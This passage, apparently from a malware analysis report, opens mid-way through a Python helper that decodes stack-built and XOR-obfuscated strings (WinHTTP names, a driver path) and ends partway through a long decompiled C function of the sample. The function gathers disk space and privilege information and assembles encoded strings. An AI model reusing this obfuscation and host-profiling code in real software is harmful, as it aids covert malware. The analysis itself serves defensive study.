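ASSIGN_RE = re.compile(r"(?<![*\w])(_t\d+)\s*=\s*(0x[0-9a-f]+|\d+);", re.I)
# A frame store, cast or uncast:  *(_t179 - 8) = 0x486e6957;
#   *((short*)(_t179 + 8)) = 0x7473;   *_t179 = 0x52646e65;   *((char*)(_t179 + 0xa)) = _t134;
STORE_RE = re.compile(
    r"\*(?:\(\((?P<cast>intOrPtr|short|char)\*\)\()?\(?"
    r"(?P<base>_t\d+)(?:\s*(?P<sign>[+-])\s*(?P<off>0x[0-9a-f]+|\d+))?\)*"
    r"\s*=\s*(?P<val>0x[0-9a-f]+|\d+|_t\d+);",
    re.I,
)
CAST_WIDTH = {"intOrPtr": 4, "short": 2, "char": 1}


def parse_stores(snippet):
    """Return [(offset, width, value)] for the constant stores, by frame offset."""
    consts, found = {}, []
    for line in snippet.splitlines():
        a = ASSIGN_RE.search(line)
        if a:
            consts[a[1]] = int(a[2], 0)
        m = STORE_RE.search(line)
        if not m:
            continue
        val = consts.get(m["val"]) if m["val"].startswith("_t") else int(m["val"], 0)
        if val is None:
            continue  # a runtime value (handle, pointer), not string data
        off = int(m["off"], 0) if m["off"] else 0
        found.append([-off if m["sign"] == "-" else off, CAST_WIDTH.get(m["cast"]), val])
    found.sort(key=lambda s: s[0])
    # Uncast stores get their width from the gap to the next store (a DWORD at
    # most); a trailing uncast store from the size of its immediate.
    for i, st in enumerate(found):
        if st[1] is None:
            if i + 1 < len(found):
                st[1] = max(1, min(found[i + 1][0] - st[0], 4))
            else:
                st[1] = 4 if st[2] > 0xFFFF else 2 if st[2] > 0xFF else 1
    return [tuple(s) for s in found]


def _runs(stores):
    """Pack stores little-endian and split them into byte-contiguous runs."""
    runs, start, buf = [], None, b""
    for off, width, val in stores:
        if start is None or off != start + len(buf):
            if buf:
                runs.append(buf)
            start, buf = off, b""
        buf += (val & ((1 << (8 * width)) - 1)).to_bytes(width, "little")
    return runs + [buf] if buf else runs


def decode_stack_strings(snippet, xor_key=0, wide=False):
    """Decode the NUL-terminated strings built by the stores in snippet.

    xor_key is the byte the sample's decode loop applies (0 for plain strings);
    wide selects UTF-16LE, as used for the L"WinHttp" module name.
    """
    out = []
    for raw in _runs(parse_stores(snippet)):
        raw = bytes(b ^ xor_key for b in raw)
        text = raw.decode("utf-16-le", "replace") if wide else raw.decode("latin-1")
        out.extend(part for part in text.split("\0") if part)
    return out


# Store sequences copied from E00965B62 (plain) and E00960762 (XOR-encoded).
WINHTTP_DLL = """ _t134 = 0x57; *((short*)(_t179 - 0xb4)) = _t134;
 _t135 = 0x69; *((short*)(_t179 - 0xb2)) = _t135;
 _t136 = 0x6e; *((short*)(_t179 - 0xb0)) = _t136;
 _t137 = 0x48; *((short*)(_t179 - 0xae)) = _t137;
 _t138 = 0x74; *((short*)(_t179 - 0xac)) = _t138;
 *((short*)(_t179 - 0xaa)) = _t138;
 _t139 = 0x70; *((short*)(_t179 - 0xa8)) = _t139;
 *((short*)(_t179 - 0xa6)) = 0;"""
WINHTTP_SEND = """ *(_t179 - 8) = 0x486e6957;
 *((intOrPtr*)(_t179 - 4)) = 0x53707474;
 *_t179 = 0x52646e65;
 *((intOrPtr*)(_t179 + 4)) = 0x65757165;
 *((short*)(_t179 + 8)) = 0x7473;
 *((char*)(_t179 + 0xa)) = 0;"""
DRIVER_PATH = """ *((intOrPtr*)(_t88 - 5)) = 0x65391617;
 *((intOrPtr*)(_t88 - 9)) = 0x130c17;
 *((intOrPtr*)(_t88 - 0xd)) = 0x1395756;
 *((intOrPtr*)(_t88 - 0x11)) = 0x8001116;
 *((short*)(_t88 - 0x13)) = 0x1c16;
 *((char*)(_t88 - 0x14)) = 0x39;"""      # decoded in a loop with ^ 0x65
DRIVER_NAME = """ *((intOrPtr*)(_t88 - 0x1b)) = 0x66151f15;
 *((intOrPtr*)(_t88 - 0x1f)) = 0x48000d05;
 *((short*)(_t88 - 0x21)) = 0x1007;"""   # decoded in a loop with ^ 0x66

if __name__ == "__main__":
    print(decode_stack_strings(WINHTTP_DLL, wide=True), decode_stack_strings(WINHTTP_SEND))
    print(decode_stack_strings(DRIVER_PATH, 0x65), decode_stack_strings(DRIVER_NAME, 0x66))
```

    Feed it the stores that sit between two GetProcAddress calls, or between a fill and its decode loop, not a whole function body: E00960762 reuses ebp-5 and ebp-9 for two different strings, and the WinHTTP names in E00965B62 lie back to back in the frame, so a whole-body pass would merge or clobber them. The same call with keys 0xf2 and 0xf3 on the two fills in E0095FE2E yields EnumDeviceDrivers and GetDeviceDriverBaseNameW, matching the K32-prefixed names the sandbox logged; none of these module or export names exist as plain strings in the binary, which is why they only surface in the API log.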
    C-Code - Quality: 89%
    			E009641C3(struct HINSTANCE__* __eax, signed short* __edx, void* __edi) {
    				void* __esi;
    				int _t494;
    				signed short* _t496;
    				void* _t499;
    				char* _t501;
    				void* _t502;
    				signed short _t504;
    				short _t505;
    				short _t506;
    				short _t507;
    				short _t508;
    				short _t509;
    				short _t510;
    				short _t511;
    				signed short* _t520;
    				signed short* _t521;
    				signed short _t522;
    				signed short* _t523;
    				signed short* _t524;
    				intOrPtr _t525;
    				void* _t532;
    				intOrPtr* _t535;
    				void* _t538;
    				intOrPtr* _t540;
    				intOrPtr* _t541;
    				signed short* _t545;
    				signed short* _t548;
    				signed short* _t551;
    				signed short* _t554;
    				signed short* _t557;
    				signed short* _t773;
    				void* _t780;
    				void* _t782;
    				void* _t783;
    				short _t785;
    				short _t786;
    				short _t787;
    				short _t788;
    				short _t789;
    				short _t790;
    				short _t791;
    				short _t794;
    				short _t795;
    				short _t796;
    				short _t797;
    				short _t798;
    				short _t799;
    				short _t800;
    				short _t803;
    				short _t804;
    				short _t805;
    				short _t806;
    				short _t807;
    				short _t808;
    				short _t809;
    				signed int _t821;
    				signed short* _t822;
    				intOrPtr _t823;
    				intOrPtr* _t826;
    				signed int _t828;
    				void* _t830;
    				void* _t831;
    				signed short _t833;
    				signed short _t834;
    				signed int _t838;
    				signed short* _t839;
    				signed int _t849;
    				signed int _t850;
    				void* _t851;
    				void* _t852;
    				signed short _t853;
    				signed short* _t854;
    				void* _t855;
    				signed short* _t856;
    				signed short* _t879;
    				intOrPtr* _t880;
    				intOrPtr _t881;
    				WCHAR* _t883;
    				signed short* _t884;
    				signed short* _t886;
    				signed short* _t888;
    				void* _t889;
    
    				_t855 = __edi;
    				_t839 = __edx;
    				GetProcAddress(__eax, ??); // executed
    				_t776 = _t889 - 0x480;
    				_t494 = GetDiskFreeSpaceExW(_t883, _t889 - 0x480, _t889 - 0x478, 0); // executed
    				if(_t494 == 0) {
    					 *(__edi + 0x55c) = 0;
    					 *(__edi + 0x558) = 0;
    				} else {
    					 *(__edi + 0x558) = ( *(_t889 - 0x474) << 0x00000020 |  *(_t889 - 0x478)) >> 0x14;
    					_t838 =  *(_t889 - 0x47c);
    					_t776 = _t838 >> 0x14;
    					 *(__edi + 0x55c) = (_t838 << 0x00000020 |  *(_t889 - 0x480)) >> 0x14;
    				}
    				E0095115B(_t776, _t839, _t883, _t883);
    				_t496 = E0095D461(0, _t855, _t883, 0); // executed
    				_t856 = _t496;
    				_push(_t889 - 0x90);
    				_t884 = _t889 - 0x46c;
    				 *(_t889 - 0x9c) = _t856;
    				 *(_t889 - 0x18) = 0;
    				L0095D1A8(); // executed
    				if( *(_t889 - 0x46c) != 0) {
    					_t557 = E0095D461(0, _t856, _t884, 1); // executed
    					 *(_t889 - 0x18) = _t557;
    				}
    				if(_t856 == 0) {
    					_t780 = 0;
    				} else {
    					_t554 = _t856;
    					_t25 =  &(_t554[1]); // 0x2
    					_t839 = _t25;
    					do {
    						_t834 =  *_t554;
    						_t554 =  &(_t554[1]);
    					} while (_t834 != 0);
    					_t780 = (_t554 - _t839 >> 1) + (_t554 - _t839 >> 1);
    				}
    				if( *(_t889 - 0x18) == 0) {
    					_t499 = 0;
    				} else {
    					_t551 =  *(_t889 - 0x18);
    					_t884 =  &(_t551[1]);
    					do {
    						_t839 =  *_t551;
    						_t551 =  &(_t551[1]);
    					} while (_t839 != 0);
    					_t499 = (_t551 - _t884 >> 1) + (_t551 - _t884 >> 1);
    				}
    				_t501 = E00951195(_t839, _t856, _t884, _t499 + _t780 + 0x960);
    				 *((intOrPtr*)(_t889 - 0x470)) = _t501;
    				_t782 = 0x400;
    				do {
    					 *_t501 = 0;
    					_t501 = _t501 + 1;
    					_t782 = _t782 - 1;
    				} while (_t782 != 0);
    				if(_t856 == 0) {
    					_t783 = 0;
    				} else {
    					_t548 = _t856;
    					_t33 =  &(_t548[1]); // 0x2
    					_t854 = _t33;
    					do {
    						_t833 =  *_t548;
    						_t548 =  &(_t548[1]);
    					} while (_t833 != 0);
    					_t783 = (_t548 - _t854 >> 1) + (_t548 - _t854 >> 1);
    				}
    				if( *(_t889 - 0x18) == 0) {
    					_t502 = 0;
    				} else {
    					_t545 =  *(_t889 - 0x18);
    					_t888 =  &(_t545[1]);
    					do {
    						_t853 =  *_t545;
    						_t545 =  &(_t545[1]);
    					} while (_t853 != 0);
    					_t502 = (_t545 - _t888 >> 1) + (_t545 - _t888 >> 1);
    				}
    				 *((intOrPtr*)(_t889 - 0x464)) = _t502 + _t783 + 0x960;
    				_t504 = 0x20;
    				 *((short*)(_t889 - 0xbc)) = _t504;
    				_t785 = 0x28;
    				 *((short*)(_t889 - 0xba)) = _t785;
    				_t786 = 0x36;
    				 *((short*)(_t889 - 0xb8)) = _t786;
    				_t787 = 0x34;
    				 *((short*)(_t889 - 0xb6)) = _t787;
    				_t788 = 0x62;
    				 *((short*)(_t889 - 0xb4)) = _t788;
    				_t789 = 0x69;
    				 *((short*)(_t889 - 0xb2)) = _t789;
    				_t790 = 0x74;
    				 *((short*)(_t889 - 0xb0)) = _t790;
    				_t791 = 0x29;
    				 *((short*)(_t889 - 0xae)) = _t791;
    				 *((short*)(_t889 - 0xac)) = 0;
    				 *((short*)(_t889 - 0xd0)) = _t504;
    				_t794 = 0x28;
    				 *((short*)(_t889 - 0xce)) = _t794;
    				_t795 = 0x33;
    				 *((short*)(_t889 - 0xcc)) = _t795;
    				_t796 = 0x32;
    				 *((short*)(_t889 - 0xca)) = _t796;
    				_t797 = 0x62;
    				 *((short*)(_t889 - 0xc8)) = _t797;
    				_t798 = 0x69;
    				 *((short*)(_t889 - 0xc6)) = _t798;
    				_t799 = 0x74;
    				 *((short*)(_t889 - 0xc4)) = _t799;
    				_t800 = 0x29;
    				 *((short*)(_t889 - 0xc2)) = _t800;
    				 *((short*)(_t889 - 0xc0)) = 0;
    				 *(_t889 - 0x128) = _t504;
    				_t803 = 0x5b;
    				 *((short*)(_t889 - 0x126)) = _t803;
    				_t804 = 0x47;
    				 *((short*)(_t889 - 0x124)) = _t804;
    				_t805 = 0x55;
    				 *((short*)(_t889 - 0x122)) = _t805;
    				_t806 = 0x45;
    				 *((short*)(_t889 - 0x120)) = _t806;
    				_t807 = 0x53;
    				 *((short*)(_t889 - 0x11e)) = _t807;
    				_t808 = 0x54;
    				 *((short*)(_t889 - 0x11c)) = _t808;
    				_t809 = 0x5d;
    				 *((short*)(_t889 - 0x11a)) = _t809;
    				 *((short*)(_t889 - 0x118)) = 0;
    				 *(_t889 - 0x114) = _t504;
    				_t505 = 0x5b;
    				 *((short*)(_t889 - 0x112)) = _t505;
    				_t506 = 0x41;
    				 *((short*)(_t889 - 0x110)) = _t506;
    				_t507 = 0x44;
    				 *((short*)(_t889 - 0x10e)) = _t507;
    				_t508 = 0x4d;
    				 *((short*)(_t889 - 0x10c)) = _t508;
    				_t509 = 0x49;
    				 *((short*)(_t889 - 0x10a)) = _t509;
    				_t510 = 0x4e;
    				 *((short*)(_t889 - 0x108)) = _t510;
    				_t511 = 0x5d;
    				 *((short*)(_t889 - 0x106)) = _t511;
    				 *((short*)(_t889 - 0x104)) = 0;
    				 *((short*)(_t889 - 0xf2)) = 0xdb;
    				 *((short*)(_t889 - 0xf4)) = 0xdb;
    				 *((short*)(_t889 - 0xf6)) = 0x8c;
    				 *((short*)(_t889 - 0xf8)) = 0x94;
    				 *((short*)(_t889 - 0xfa)) = 0xdb;
    				 *((short*)(_t889 - 0xfc)) = 0x90;
    				 *((short*)(_t889 - 0xfe)) = 0xdb;
    				 *((short*)(_t889 - 0x100)) = 0x8e;
    				 *((short*)(_t889 - 0x258)) = 0xe6;
    				 *((short*)(_t889 - 0x25a)) = 0xdb;
    				 *((short*)(_t889 - 0x25c)) = 0xc3;
    				 *((short*)(_t889 - 0x25e)) = 0xec;
    				 *((short*)(_t889 - 0x260)) = 0xdc;
    				 *((short*)(_t889 - 0x262)) = 0xcf;
    				 *((short*)(_t889 - 0x264)) = 0xd2;
    				 *((short*)(_t889 - 0x266)) = 0xd0;
    				 *((short*)(_t889 - 0x268)) = 0x9e;
    				 *((short*)(_t889 - 0x26a)) = 0xce;
    				 *((short*)(_t889 - 0x26c)) = 0xc6;
    				 *((short*)(_t889 - 0x26e)) = 0x92;
    				 *((char*)(_t889 - 0xf0)) = 0;
    				 *((short*)(_t889 - 0x270)) = 0xdb;
    				 *((short*)(_t889 - 0x272)) = 0x8f;
    				 *((short*)(_t889 - 0x274)) = 0xaa;
    				 *((short*)(_t889 - 0x276)) = 0x88;
    				 *((short*)(_t889 - 0x278)) = 0x89;
    				 *((short*)(_t889 - 0x27a)) = 0x8f;
    				 *((short*)(_t889 - 0x27c)) = 0x92;
    				 *((short*)(_t889 - 0x27e)) = 0x87;
    				 *((short*)(_t889 - 0x280)) = 0x85;
    				 *((short*)(_t889 - 0x282)) = 0x8f;
    				 *((short*)(_t889 - 0x284)) = 0x8a;
    				 *((short*)(_t889 - 0x286)) = 0x96;
    				 *((short*)(_t889 - 0x288)) = 0x96;
    				 *((short*)(_t889 - 0x28a)) = 0xa7;
    				 *((short*)(_t889 - 0x28c)) = 0xec;
    				 *((short*)(_t889 - 0x28e)) = 0xdb;
    				 *((short*)(_t889 - 0x290)) = 0xc3;
    				 *((short*)(_t889 - 0x292)) = 0xec;
    				 *((short*)(_t889 - 0x294)) = 0xdc;
    				 *((short*)(_t889 - 0x296)) = 0xcf;
    				 *((short*)(_t889 - 0x298)) = 0xd0;
    				 *((short*)(_t889 - 0x29a)) = 0xde;
    				 *((short*)(_t889 - 0x29c)) = 0x9e;
    				 *((short*)(_t889 - 0x29e)) = 0xce;
    				 *((short*)(_t889 - 0x2a0)) = 0xc6;
    				 *((short*)(_t889 - 0x2a2)) = 0x92;
    				 *((short*)(_t889 - 0x2a4)) = 0xdb;
    				 *((short*)(_t889 - 0x2a6)) = 0x8f;
    				 *((short*)(_t889 - 0x2a8)) = 0xaa;
    				 *((short*)(_t889 - 0x2aa)) = 0xc6;
    				 *((short*)(_t889 - 0x2ac)) = 0x88;
    				 *((short*)(_t889 - 0x2ae)) = 0x89;
    				 *((short*)(_t889 - 0x2b0)) = 0x8f;
    				 *((short*)(_t889 - 0x2ba)) = 0x8a;
    				 *((short*)(_t889 - 0x2b2)) = 0x92;
    				 *((short*)(_t889 - 0x2be)) = 0x96;
    				 *((short*)(_t889 - 0x2b4)) = 0x87;
    				 *((short*)(_t889 - 0x2c0)) = 0xa7;
    				 *((short*)(_t889 - 0x2c2)) = 0xec;
    				 *((short*)(_t889 - 0x2c4)) = 0xdb;
    				 *((short*)(_t889 - 0x2c6)) = 0xc3;
    				 *((short*)(_t889 - 0x2c8)) = 0xc6;
    				 *((short*)(_t889 - 0x2ca)) = 0xdc;
    				 *((short*)(_t889 - 0x2cc)) = 0xa2;
    				 *((short*)(_t889 - 0x2bc)) = 0x96;
    				 *((short*)(_t889 - 0x2ce)) = 0xaf;
    				 *((intOrPtr*)(_t889 - 0x2b8)) = 0x85008f;
    				 *((short*)(_t889 - 0x2d0)) = 0xb5;
    				 *((short*)(_t889 - 0x2d2)) = 0xec;
    				 *((short*)(_t889 - 0x2d4)) = 0xdb;
    				 *((short*)(_t889 - 0x2d6)) = 0xc3;
    				 *((short*)(_t889 - 0x2d8)) = 0xdb;
    				 *((short*)(_t889 - 0x2da)) = 0xc3;
    				 *((short*)(_t889 - 0x2dc)) = 0xdb;
    				 *((short*)(_t889 - 0x2de)) = 0xc3;
    				 *((short*)(_t889 - 0x2e0)) = 0xdb;
    				 *((short*)(_t889 - 0x2e2)) = 0xc3;
    				 *((short*)(_t889 - 0x2e4)) = 0xdb;
    				 *((short*)(_t889 - 0x2e6)) = 0xc3;
    				 *((short*)(_t889 - 0x2e8)) = 0xc6;
    				 *((short*)(_t889 - 0x2ea)) = 0xdc;
    				 *((short*)(_t889 - 0x2ec)) = 0x89;
    				 *((short*)(_t889 - 0x2f4)) = 0xc6;
    				 *((short*)(_t889 - 0x2ee)) = 0x80;
    				 *((short*)(_t889 - 0x2f6)) = 0x94;
    				 *((short*)(_t889 - 0x2f8)) = 0x83;
    				 *((short*)(_t889 - 0x2fa)) = 0xdb;
    				 *((short*)(_t889 - 0x2fc)) = 0xb3;
    				 *((short*)(_t889 - 0x2fe)) = 0xec;
    				 *((short*)(_t889 - 0x300)) = 0xec;
    				 *((short*)(_t889 - 0x302)) = 0xcf;
    				 *((short*)(_t889 - 0x304)) = 0xdb;
    				 *((short*)(_t889 - 0x306)) = 0xc3;
    				 *((short*)(_t889 - 0x308)) = 0xce;
    				 *((short*)(_t889 - 0x30a)) = 0xc6;
    				 *((short*)(_t889 - 0x30c)) = 0xdb;
    				 *((short*)(_t889 - 0x30e)) = 0xc3;
    				 *((short*)(_t889 - 0x310)) = 0xb9;
    				 *((short*)(_t889 - 0x312)) = 0xdb;
    				 *((short*)(_t889 - 0x314)) = 0xc3;
    				 *((short*)(_t889 - 0x316)) = 0xc6;
    				 *((short*)(_t889 - 0x318)) = 0xdc;
    				 *((short*)(_t889 - 0x31a)) = 0x83;
    				 *((short*)(_t889 - 0x31c)) = 0x8a;
    				 *((short*)(_t889 - 0x31e)) = 0x87;
    				 *((short*)(_t889 - 0x320)) = 0x85;
    				 *((short*)(_t889 - 0x322)) = 0x89;
    				 *((intOrPtr*)(_t889 - 0x2f2)) = 0x8800af;
    				 *((short*)(_t889 - 0x324)) = 0xaa;
    				 *((short*)(_t889 - 0x326)) = 0xec;
    				 *((short*)(_t889 - 0x328)) = 0x9b;
    				 *((short*)(_t889 - 0x32a)) = 0xdb;
    				 *((short*)(_t889 - 0x32c)) = 0xc3;
    				 *((short*)(_t889 - 0x32e)) = 0x9d;
    				 *((short*)(_t889 - 0x330)) = 0xc6;
    				 *((short*)(_t889 - 0x332)) = 0xdb;
    				 *((short*)(_t889 - 0x334)) = 0xc3;
    				 *((short*)(_t889 - 0x336)) = 0xdb;
    				 *((short*)(_t889 - 0x338)) = 0xc3;
    				 *((short*)(_t889 - 0x33a)) = 0xdb;
    				 *((short*)(_t889 - 0x33c)) = 0xc3;
    				 *((short*)(_t889 - 0x33e)) = 0xdb;
    				 *((short*)(_t889 - 0x340)) = 0xc3;
    				 *((short*)(_t889 - 0x342)) = 0xc6;
    				 *((short*)(_t889 - 0x344)) = 0xdc;
    				 *((short*)(_t889 - 0x346)) = 0x89;
    				 *((short*)(_t889 - 0x348)) = 0x92;
    				 *((short*)(_t889 - 0x34a)) = 0xc6;
    				 *((short*)(_t889 - 0x34c)) = 0x82;
    				 *((short*)(_t889 - 0x34e)) = 0x83;
    				 *((short*)(_t889 - 0x350)) = 0x94;
    				 *((short*)(_t889 - 0x352)) = 0x83;
    				 *((short*)(_t889 - 0x354)) = 0x92;
    				 *((short*)(_t889 - 0x356)) = 0xdb;
    				 *((short*)(_t889 - 0x358)) = 0x8f;
    				 *((short*)(_t889 - 0x35a)) = 0x81;
    				 *((short*)(_t889 - 0x35c)) = 0x83;
    				 *((short*)(_t889 - 0x35e)) = 0xb4;
    				 *((short*)(_t889 - 0x360)) = 0xec;
    				 *((short*)(_t889 - 0x362)) = 0xdb;
    				 *((short*)(_t889 - 0x364)) = 0xc3;
    				 *((short*)(_t889 - 0x366)) = 0xdb;
    				 *((short*)(_t889 - 0x368)) = 0xc3;
    				 *((short*)(_t889 - 0x36a)) = 0xdb;
    				 *((short*)(_t889 - 0x36c)) = 0xc3;
    				 *((short*)(_t889 - 0x36e)) = 0xdb;
    				 *((short*)(_t889 - 0x370)) = 0xc3;
    				 *((short*)(_t889 - 0x372)) = 0xdb;
    				 *((short*)(_t889 - 0x374)) = 0xc3;
    				 *((short*)(_t889 - 0x376)) = 0xc6;
    				 *((short*)(_t889 - 0x378)) = 0xdc;
    				 *((short*)(_t889 - 0x37a)) = 0x88;
    				 *((short*)(_t889 - 0x37c)) = 0x89;
    				 *((short*)(_t889 - 0x37e)) = 0x8f;
    				 *((short*)(_t889 - 0x380)) = 0xdb;
    				 *((short*)(_t889 - 0x382)) = 0x94;
    				 *((short*)(_t889 - 0x384)) = 0x83;
    				 *((short*)(_t889 - 0x386)) = 0xb0;
    				 *((short*)(_t889 - 0x388)) = 0xc6;
    				 *((short*)(_t889 - 0x38a)) = 0xdb;
    				 *((short*)(_t889 - 0x38c)) = 0x91;
    				 *((short*)(_t889 - 0x38e)) = 0x89;
    				 *((short*)(_t889 - 0x390)) = 0x82;
    				 *((short*)(_t889 - 0x392)) = 0x88;
    				 *((short*)(_t889 - 0x394)) = 0x8f;
    				 *((short*)(_t889 - 0x396)) = 0xb1;
    				 *((short*)(_t889 - 0x398)) = 0xec;
    				 *((short*)(_t889 - 0x39a)) = 0xec;
    				 *((short*)(_t889 - 0x39c)) = 0x8a;
    				 *((short*)(_t889 - 0x39e)) = 0x87;
    				 *((short*)(_t889 - 0x3a0)) = 0x92;
    				 *((short*)(_t889 - 0x3a2)) = 0x89;
    				 *((short*)(_t889 - 0x3a4)) = 0x92;
    				 *((short*)(_t889 - 0x3a6)) = 0xc6;
    				 *((short*)(_t889 - 0x3a8)) = 0xa4;
    				 *((short*)(_t889 - 0x3aa)) = 0xab;
    				 *((short*)(_t889 - 0x3ac)) = 0x82;
    				 *((short*)(_t889 - 0x3ae)) = 0xc3;
    				 *((short*)(_t889 - 0x3b0)) = 0xc6;
    				 *((short*)(_t889 - 0x3b2)) = 0xc9;
    				 *((short*)(_t889 - 0x3b4)) = 0xc6;
    				 *((short*)(_t889 - 0x3b6)) = 0x83;
    				 *((short*)(_t889 - 0x3b8)) = 0x83;
    				 *((short*)(_t889 - 0x3ba)) = 0x94;
    				 *((short*)(_t889 - 0x3bc)) = 0x80;
    				 *((short*)(_t889 - 0x3be)) = 0xc6;
    				 *((short*)(_t889 - 0x3c0)) = 0xa4;
    				 *((short*)(_t889 - 0x3c2)) = 0xab;
    				 *((short*)(_t889 - 0x3c4)) = 0x82;
    				 *((short*)(_t889 - 0x3c6)) = 0xc3;
    				 *((short*)(_t889 - 0x3c8)) = 0xc6;
    				 *((short*)(_t889 - 0x3ca)) = 0xdc;
    				 *((short*)(_t889 - 0x3cc)) = 0x8d;
    				 *((short*)(_t889 - 0x3ce)) = 0xdb;
    				 *((short*)(_t889 - 0x3d0)) = 0x8f;
    				 *((short*)(_t889 - 0x3d2)) = 0xa2;
    				 *((short*)(_t889 - 0x3d4)) = 0xc6;
    				 *((short*)(_t889 - 0x3d6)) = 0x82;
    				 *((short*)(_t889 - 0x3d8)) = 0x94;
    				 *((short*)(_t889 - 0x3da)) = 0x87;
    				 *((short*)(_t889 - 0x3dc)) = 0xae;
    				 *((short*)(_t889 - 0x3de)) = 0xec;
    				 *((short*)(_t889 - 0x3e0)) = 0xcf;
    				 *((short*)(_t889 - 0x3e2)) = 0x82;
    				 *((short*)(_t889 - 0x3e4)) = 0x83;
    				 *((short*)(_t889 - 0x3e6)) = 0xdb;
    				 *((short*)(_t889 - 0x3e8)) = 0x93;
    				 *((short*)(_t889 - 0x3ea)) = 0xc6;
    				 *((short*)(_t889 - 0x3ec)) = 0xc3;
    				 *((short*)(_t889 - 0x3ee)) = 0xc3;
    				 *((short*)(_t889 - 0x3f0)) = 0x93;
    				 *((short*)(_t889 - 0x3f2)) = 0xc3;
    				 *((short*)(_t889 - 0x3f4)) = 0xce;
    				 *((short*)(_t889 - 0x3f6)) = 0xc6;
    				 *((short*)(_t889 - 0x3f8)) = 0x8a;
    				 *((short*)(_t889 - 0x3fa)) = 0x87;
    				 *((short*)(_t889 - 0x3fc)) = 0x92;
    				 *((short*)(_t889 - 0x3fe)) = 0x89;
    				 *((short*)(_t889 - 0x400)) = 0x92;
    				 *((short*)(_t889 - 0x402)) = 0xc6;
    				 *((short*)(_t889 - 0x404)) = 0xa4;
    				 *((short*)(_t889 - 0x406)) = 0xab;
    				 *((short*)(_t889 - 0x408)) = 0x82;
    				 *((short*)(_t889 - 0x40a)) = 0xc3;
    				 *((short*)(_t889 - 0x40c)) = 0xc6;
    				 *((short*)(_t889 - 0x40e)) = 0x83;
    				 *((short*)(_t889 - 0x410)) = 0x83;
    				 *((short*)(_t889 - 0x412)) = 0x94;
    				 *((short*)(_t889 - 0x414)) = 0x80;
    				 *((short*)(_t889 - 0x416)) = 0xc6;
    				 *((short*)(_t889 - 0x418)) = 0xa4;
    				 *((short*)(_t889 - 0x41a)) = 0xab;
    				 *((short*)(_t889 - 0x41c)) = 0x82;
    				 *((short*)(_t889 - 0x41e)) = 0xc3;
    				 *((short*)(_t889 - 0x420)) = 0xc6;
    				 *((short*)(_t889 - 0x422)) = 0xdc;
    				 *((short*)(_t889 - 0x424)) = 0xab;
    				 *((short*)(_t889 - 0x426)) = 0xa7;
    				 *((short*)(_t889 - 0x428)) = 0xb4;
    				 *((short*)(_t889 - 0x42a)) = 0xec;
    				 *((short*)(_t889 - 0x42c)) = 0x95;
    				 *((short*)(_t889 - 0x42e)) = 0xc3;
    				 *((short*)(_t889 - 0x430)) = 0xc6;
    				 *((short*)(_t889 - 0x432)) = 0xdc;
    				 *((short*)(_t889 - 0x434)) = 0x83;
    				 *((short*)(_t889 - 0x44e)) = 0x95;
    				 *((short*)(_t889 - 0x436)) = 0x94;
    				 *((short*)(_t889 - 0x450)) = 0xc3;
    				 *((short*)(_t889 - 0x438)) = 0x93;
    				 *((short*)(_t889 - 0x440)) = 0x92;
    				 *((short*)(_t889 - 0x452)) = 0xc6;
    				 *((short*)(_t889 - 0x442)) = 0x8f;
    				 *((short*)(_t889 - 0x45c)) = 0xb3;
    				 *((short*)(_t889 - 0x444)) = 0x8e;
    				 *((short*)(_t889 - 0x45e)) = 0xb6;
    				 *((short*)(_t889 - 0x446)) = 0x85;
    				 *((short*)(_t889 - 0x460)) = 0xa5;
    				_t520 =  *(_t889 - 0x18);
    				 *((short*)(_t889 - 0x448)) = 0x94;
    				 *((short*)(_t889 - 0x43a)) = 0x92;
    				 *((intOrPtr*)(_t889 - 0x43e)) = 0x850083;
    				 *((intOrPtr*)(_t889 - 0x44c)) = 0xa700ec;
    				 *((intOrPtr*)(_t889 - 0x456)) = 0x8200c3;
    				 *((intOrPtr*)(_t889 - 0x45a)) = 0xc600dc;
    				 *((char*)(_t889 - 0x256)) = 0;
    				_t879 = 0x9706d0;
    				 *(_t889 - 0xa4) = _t520;
    				if(_t520 == 0) {
    					 *(_t889 - 0xa4) = 0x9706d0;
    				}
    				_t521 =  *(_t889 - 0x9c);
    				 *(_t889 - 0xa8) = _t521;
    				if(_t521 == 0) {
    					 *(_t889 - 0xa8) = _t879;
    				}
    				_t886 =  *(_t889 - 4);
    				_t522 = _t886[0x288];
    				if(_t522 == 0) {
    					_t523 = _t889 - 0x128;
    					goto L36;
    				} else {
    					if(_t522 != 1) {
    						_t523 = _t889 - 0x114;
    						L36:
    						 *(_t889 - 4) = _t523;
    					} else {
    						 *(_t889 - 4) = _t879;
    					}
    				}
    				_t524 =  &(_t886[0x208]);
    				_t821 =  *_t524 & 0x0000ffff;
    				 *(_t889 - 0xa0) = 0x9706d4;
    				if(_t821 != 0) {
    					 *(_t889 - 0x94) = _t524;
    				} else {
    					 *(_t889 - 0xa0) = _t879;
    					 *(_t889 - 0x94) = _t879;
    				}
    				 *(_t889 - 0x84) = 0x9706d8;
    				if(_t821 == 0) {
    					 *(_t889 - 0x84) = _t879;
    				}
    				_t525 =  *((intOrPtr*)(_t889 - 8));
    				if(_t525 == 0) {
    					_t525 = L0095102D(_t889 - 0x100);
    				}
    				_t822 =  &(_t886[0x188]);
    				_t849 =  *_t822 & 0x0000ffff;
    				 *(_t889 - 0x8c) = 0x9706d4;
    				if(_t849 != 0) {
    					 *(_t889 - 0x98) = _t822;
    				} else {
    					 *(_t889 - 0x8c) = _t879;
    					 *(_t889 - 0x98) = _t879;
    				}
    				 *(_t889 - 0x88) = 0x9706d8;
    				if(_t849 == 0) {
    					 *(_t889 - 0x88) = _t879;
    				}
    				_t823 = _t889 - 0xbc;
    				if( *((intOrPtr*)(_t889 - 0x90)) == 0) {
    					_t823 = _t889 - 0xd0;
    				}
    				_t850 = _t886[0xc8] & 0x0000ffff;
    				 *((intOrPtr*)(_t889 - 0x80)) = _t823;
    				 *(_t889 - 0x30) = 0x9706d4;
    				if(_t850 != 0) {
    					_t773 =  &(_t886[0xc8]);
    				} else {
    					 *(_t889 - 0x30) = _t879;
    					_t773 = _t879;
    				}
    				if(_t850 != 0) {
    					_t879 = 0x9706d8;
    				}
    				_t851 = _t889 - 0xbc;
    				if( *((intOrPtr*)(_t889 - 0x90)) == 0) {
    					_t851 = _t889 - 0xd0;
    				}
    				_push( *(_t889 - 0xa4));
    				_push( *(_t889 - 0xa8));
    				_push( &(_t886[0x248]));
    				_push( *(_t889 - 4));
    				_push( *(_t889 - 0xa0));
    				_push( *(_t889 - 0x94));
    				_push( *(_t889 - 0x84));
    				_push( &(_t886[0x1c8]));
    				_push(_t525);
    				_push( &(_t886[0x29c]));
    				_push( &(_t886[0x28c]));
    				_push( &(_t886[0x108]));
